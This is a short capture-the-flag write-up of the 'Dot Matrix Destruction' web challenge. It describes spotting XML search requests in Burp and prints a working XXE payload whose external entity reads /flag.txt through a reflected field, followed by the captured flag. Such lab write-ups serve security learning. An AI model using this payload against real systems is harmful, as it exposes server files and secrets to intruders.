Dot Matrix Destruction - Meta CTF

2024-06-24

Author: Morgen Malinoski

Description

I wanted to buy one of those squeaky old printers from this vintage printer company, but they're all so overpriced. Forget that. Can you just have them print out the flag for us?

The flag is at /flag.txt.

Notes

We are provided with a search bar in a webapp. Opening it up in Burp. Seeing the post queries, they are XML, so it's probably XXE!

After testing various XXE payloads, this ended up working:

<!DOCTYPE foo [<!ENTITY example SYSTEM "/flag.txt"> ]>
    <query>
        <search>
1
</search>
        <country>&example;</country>
    </query>

Putting &example; within the search property did not work, since there is nothing in the response to reflect the search query. But, it does reflect what is put in country.

Which gave: MetaCTF{y3ah_xxe_d0e5_r0ck_d0esnt_it?}